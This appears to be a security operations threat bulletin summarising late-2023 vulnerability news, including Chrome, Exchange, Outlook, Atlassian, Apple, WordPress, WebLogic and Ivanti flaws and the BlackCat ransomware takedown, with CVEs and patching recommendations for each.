Threat Bulletin | December 28

Sources: 

• https://thehackernews.com/2023/11/zero-day-alert-google-chrome-under.html

Entities:  

• Google Chrome 
• Skia Graphics Library

Indicators of Compromise:  

• CVE-2023-6345

Attack Vectors:  

• Web Browser Exploitation
• Integer Overflow in Skia Graphics Library

Impact:  

• Active Exploitation in the Wild
• Potential for Remote Code Execution
• Information Disclosure

Detailed Description: 

• Google has released security updates for Chrome, fixing seven vulnerabilities, including a zero-day (CVE-2023-6345) actively exploited in the wild.
• The flaw is categorized as an integer overflow bug in the Skia 2D graphics library.
• The search giant has credited the discovery to its Threat Analysis Group.
• While Google has acknowledged the existence of an exploit, specific details about the ongoing attacks and threat actors involved have not been disclosed.
• Users are advised to upgrade to Chrome version 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux to mitigate potential threats.
• Users of Chromium-based browsers like Microsoft Edge, Brave, Opera, and Vivaldi should also apply the fixes when available.

Recommendations: 

• Users should immediately update their Google Chrome browsers to version 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux.

Sources: 

• https://www.bleepingcomputer.com/news/security/over-20-000-vulnerable-microsoft-exchange-servers-exposed-to-attacks/ 
• https://www.techradar.com/pro/security/thousands-of-microsoft-exchange-servers-left-open-to-attack 

Entities: 

• Microsoft Exchange Servers

Indicators of Compromise:  

• CVE-2020-0688 
• CVE-2021-26855 (ProxyLogon) 
• CVE-2021-27065 (part of the ProxyLogon exploit chain) 
• CVE-2022-41082 (part of the ProxyNotShell exploit chain) 
• CVE-2023-21529 
• CVE-2023-36745 
• CVE-2023-36439 

Attack Vectors: 

• Remote code execution on outdated Microsoft Exchange servers

Impact:  

• Tens of thousands of Microsoft Exchange servers in Europe, the U.S., and Asia are exposed to attacks due to running unsupported software versions, making them vulnerable to multiple security issues, some critical.

Detailed Description: 

• According to the ShadowServer Foundation, Over 20,000 Microsoft Exchange servers have reached end-of-life (EoL) and are exposed on the public internet.
• The ShadowServer Foundation’s statistics show a significant number of vulnerable servers, with the majority located in Europe.
• According to Sejiyama’s scans on Shodan, in late November there were 30,635 machines on the public web with an unsupported version of Microsoft Exchange: 

• • 275 instances of Exchange Server 2007
  • 4,062 instances of Exchange Server 2010
  • 26,298 instances of Exchange Server 2013

• Machines running older versions of the Exchange mail server are vulnerable to ProxyLogon, a critical security issue tracked as CVE-2021-26855, that can be chained with a less severe bug identified as CVE-2021-27065 to achieve remote code execution.

Recommendations:  

• Organizations should urgently update their Microsoft Exchange servers to versions that are currently supported and receive security updates.
• Mitigations alone may not be sufficient; Microsoft recommends prioritizing the installation of updates for externally facing servers.

Sources: 

• https://thehackernews.com/2023/12/microsoft-warns-of-kremlin-backed-apt28.html 
• https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/  

Entities: 

• Microsoft 
• APT28 (Forest Blizzard) 
• Exchange servers 

Indicators of Compromise:  

• CVE-2023-23397 
• Forest Blizzard (formerly Strontium) 
• Net-NTLMv2 hash 
• wpgate.zip 

Attack Vectors:  

• Exploitation of Critical Security Flaw (CVE-2023-23397) in Microsoft Outlook 

Impact:  

• Unauthorized access to Exchange server accounts, potential compromise of mailboxes in public and private entities, long-term persistence through folder permission modifications. 

Detailed Description: 

• APT28, known as Forest Blizzard, is leveraging a critical security flaw (CVE-2023-23397) in Microsoft Outlook, as reported by Microsoft and the Polish Cyber Command.  
• The goal is unauthorized access to Exchange server accounts, with the threat actor subsequently modifying folder permissions to ensure prolonged access to compromised mailboxes.  
• This exploits Microsoft’s patch from March 2023 and aligns with previous disclosures of Russia-backed attacks. 

Recommendations: 

1. For organizations leveraging on-premises Microsoft Exchange Server, apply the latest security updates to ensure that defense-in-depth mitigations are active. 
2. Use multifactor authentication to mitigate the impact of potential Net-NTLMv2 Relay attacks. NOTE: This will not prevent a threat actor from leaking credentials and cracking them offline. 
3. Disable unnecessary services on Exchange. 
4. Limit SMB traffic by blocking connections on ports 135 and 445 from all inbound IP addresses except those on a controlled allowlist. 
5. Review the following article provided by Microsoft to effectively investigate internally for your organization if needed. 

SOC Response: 

• The SOC has created a custom detection for all clients, to look for the known indicators of compromise at this time.  

Sources: 

• https://thehackernews.com/2023/12/atlassian-releases-critical-software.html  
• https://confluence.atlassian.com/security/december-2023-security-advisories-overview-1318892103.html

Entities:  

• Atlassian  
• SnakeYAML library 
• Confluence 
• Jira Service Management 
• Atlassian Companion app 

Indicators of Compromise:  

• CVE-2022-1471 
• CVE-2023-22522 
• CVE-2023-22523 
• CVE-2023-22524 

Attack Vectors: 

• Deserialization vulnerability 
• Remote code execution in Confluence 
• Template injection in Confluence 
• Remote code execution in Assets Discovery 
• Remote code execution in Atlassian Companion app 

Impact:  

• Remote code execution 
• Potential compromise of affected products 

Detailed Description: 

• Atlassian has released critical software fixes for four vulnerabilities: 

• • CVE-2022-1471 (CVSS score: 9.8) – Deserialization vulnerability in SnakeYAML library that can lead to remote code execution in multiple products 
  • CVE-2023-22522 (CVSS score: 9.0) – Remote code execution vulnerability in Confluence Data Center and Confluence Server (affects all versions including and after 4.0.0) 
  • CVE-2023-22523 (CVSS score: 9.8) – Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server) 
  • CVE-2023-22524 (CVSS score: 9.6) – Remote code execution vulnerability in Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0) 

• Successful exploitation could lead to remote code execution. 

Recommendations: 

• Please review the following security advisories provided by Atlassian and take the necessary steps to fix these vulnerabilities as needed.

Sources: 

• https://thehackernews.com/2023/12/apple-releases-security-updates-to.html  
• https://support.apple.com/en-us/HT201222 

Entities:  

• Apple OS 
  • iOS 
  • iPadOS 
  • MacOS 
  • tvOS 
  • WatchOS 
• Security Updates 

Attack Vectors:  

• Exploitation of multiple security vulnerabilities 
• Including keystroke injection (CVE-2023-45866) 
• WebKit flaws (CVE-2023-42890, CVE-2023-42883) 

Impact:  

• Arbitrary code execution 
• Denial-of-Service (DoS) 
• Sensitive data exposure 

Detailed Description: 

• Apple’s security updates address 12 vulnerabilities in iOS and iPadOS, spanning various components, and resolve 39 shortcomings in macOS Sonoma 14.2. Safari 17.2 fixes WebKit flaws. 
• Notable vulnerabilities include CVE-2023-45866, a critical issue allowing keystroke injection, and WebKit flaws (CVE-2023-42890, CVE-2023-42883) with the potential for arbitrary code execution and DoS.  
• The updates also address actively exploited WebKit vulnerabilities (CVE-2023-42916, CVE-2023-42917).  
• A Siri bug in iOS 17.2 and iPadOS 17.2 is fixed, and a Contact Key Verification security upgrade is introduced to enhance iMessage conversation privacy. 

Recommendations: 

• Users are advised to update their Apple devices promptly to the latest software versions. Please review the following Apple Support article to determine if your device requires any necessary updates. 

Sources: 

• https://www.bleepingcomputer.com/news/security/50k-wordpress-sites-exposed-to-rce-attacks-by-critical-bug-in-backup-plugin/  

Entities:  

• WordPress 
• Backup Migration Plugin 

Attack Vectors:  

• Remote Code Execution (RCE) via PHP code injection 

Impact:  

• Complete compromise of vulnerable websites 
• Arbitrary PHP code execution 
• Unauthorized access 

Detailed Description: 

• A critical vulnerability (CVE-2023-6553) in the Backup Migration WordPress plugin allows unauthenticated attackers to achieve remote code execution, potentially resulting in the complete compromise of vulnerable websites.  
• The flaw arises from PHP code injection via the /includes/backup-heart.php file.  
• Exploitation is possible through specially crafted requests, enabling threat actors to include arbitrary, malicious PHP code and execute arbitrary commands on the server in the context of the WordPress instance.  
• Despite a prompt patch release (version 1.3.8) by BackupBliss, a significant number of WordPress sites using vulnerable versions are yet to be secured. 

Recommendations: 

• WordPress administrators are strongly advised to update the Backup Migration plugin to the patched version 1.3.8 promptly to mitigate the risk of exploitation.

Sources: 

• https://thehackernews.com/2023/12/8220-gang-exploiting-oracle-weblogic.html  
• https://www.oracle.com/security-alerts/cpuoct2020.html

Entities: 

• 8220 Gang 
• Oracle WebLogic Server 
• CVE-2020-14883 

Attack Vectors:  

• CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) 

Impact:  

• Compromised servers 
• Execution of malicious code 
• Deployment of stealer and coin mining malware 
• Potential data theft 
• Unauthorized access 

Detailed Description: 

• The 8220 Gang is actively exploiting a high-severity vulnerability (CVE-2020-14883) in Oracle WebLogic Server to spread malware.  
• This flaw allows remote authenticated attackers to execute code, and it is commonly used in combination with other vulnerabilities like CVE-2020-14882 or leaked credentials.  
• The attackers craft XML files to exploit CVE-2020-14883, leading to the deployment of stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.  
• The group targets a range of sectors, including healthcare, telecommunications, and financial services, across different countries.  

Recommendations: 

• Organizations using Oracle WebLogic Server should apply security patches from the following Oracle Patch Advisory to mitigate the risks associated with CVE-2020-14883. 

Sources: 

• https://thehackernews.com/2023/12/microsoft-warns-of-hackers-exploiting.html?m=1  

Entities:  

• OAuth applications 
• Cryptocurrency Mining 
• Phishing 

Attack Vectors:  

• Phishing 
• Password-spraying 
• Compromised user accounts 

Impact:  

• Cryptocurrency mining 
• Email phishing attacks 
• Business Email Compromise (BEC) fraud 
• Session cookie theft 
• Use OAauth application to send spam emails 

Detailed Description: 

• Microsoft has identified adversaries, particularly Storm-1283, exploiting OAuth applications to automate virtual machine deployment for cryptocurrency mining and launch phishing attacks.  
• Compromised user accounts are used to create or modify OAuth applications, enabling threat actors to maintain persistence and conduct various malicious activities, such as email phishing with an adversary-in-the-middle (AiTM) kit.  
• The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account. 

Recommendations: 

• Organizations are advised to enforce multi-factor authentication (MFA), enable conditional access policies, and regularly audit applications and consented permissions to mitigate the risks associated with OAuth-based attacks.

Sources: 

• https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/  

Entities:  

• Google 
• Zero-Day Exploit Fix 

Attack Vectors:  

• Heap Buffer Overflow in WebRTC Framework  

Impact:  

• State-sponsored attacks 
• Exploitation in the wild 
• Potential deployment of spyware 

Detailed Description: 

• The zero-day vulnerability (CVE-2023-7024) is a heap buffer overflow weakness in the WebRTC framework used for Real-Time Communications (RTC) capabilities.  
• Google acknowledges the exploitation of this vulnerability in the wild but has not disclosed specific details.  
• The emergency update is available for Chrome users on Windows (120.0.6099.129/130) and Mac/Linux (120.0.6099.129).  
• Google aims to restrict access to bug details to prevent threat actors from exploiting the vulnerability further. 

Recommendations: 

• Users are strongly advised to update their Chrome browser to the latest version immediately.

Sources: 

• https://www.bleepingcomputer.com/news/security/ivanti-releases-patches-for-13-critical-avalanche-rce-flaws/#google_vignette   

Entities:  

• Ivanti 
• Patches for critical Avalanche RCE flaws 

Attack Vectors: 

• Unauthenticated Buffer Overflows 
• Stack-based Buffer Overflows 
• Null Pointer Dereference 

Impact:  

• Remote Code Execution 
• Denial of Service 

Detailed Description: 

• Ivanti’s Avalanche MDM solution is affected by 13 critical security vulnerabilities, including unauthenticated buffer overflows and stack-based buffer overflows.
• Attackers can exploit these flaws without user interaction, potentially leading to remote code execution or denial of service.  
• Ivanti recommends users to update to the latest version, Avalanche 6.4.2, to address these vulnerabilities.
• The company also patched eight medium- and high-severity bugs that could result in denial of service, remote code execution, and server-side request forgery (SSRF) attacks.

Recommendations: 

• Organizations using Ivanti’s Avalanche MDM solution should immediately update to the latest version, Avalanche 6.4.2, to mitigate the risk of exploitation. 
• Please review the following security advisory by Ivanti for additional information regarding these CVE’s and release notes regarding these patches.

Sources: 

• https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html  
• https://www.wired.com/story/alphv-blackcat-ransomware-doj-takedown/

Entities:  

• U.S. Department of Justice (DoJ) 
• Federal Bureau of Investigation (FBI) 
• BlackCat  

Attack Vectors:  

• Ransomware-as-a-Service (RaaS) 
• Phishing attacks 

Impact:  

• Over 1,000 victims affected, $300 million in estimated illegal revenues 

Detailed Description: 

• The U.S. DoJ announces the disruption of BlackCat ransomware operations, providing a decryption tool for affected victims.  
• The FBI collaborated with multiple international law enforcement agencies to dismantle the gang’s infrastructure and collect key pairs used to host TOR sites.  
• BlackCat, the second most prolific RaaS after LockBit, has been active since December 2021 and employs the Rust programming language.  
• Affected victims saved approximately $68 million in ransom payments. 
• Since this disruption however, the BlackCat ransomware group claims the FBI operation has only affected a portion of its operations and due to these actions they have released restrictions to now include hospitals, power plants, and critical infrastructure. 

Recommendations: 

• Any previously affected victims are advised to use the provided decryption tool to regain access to locked files.  
• Please review the following Stop Ransomware Guide provided by CISA to best mitigate the risk of Ransomware within your organization.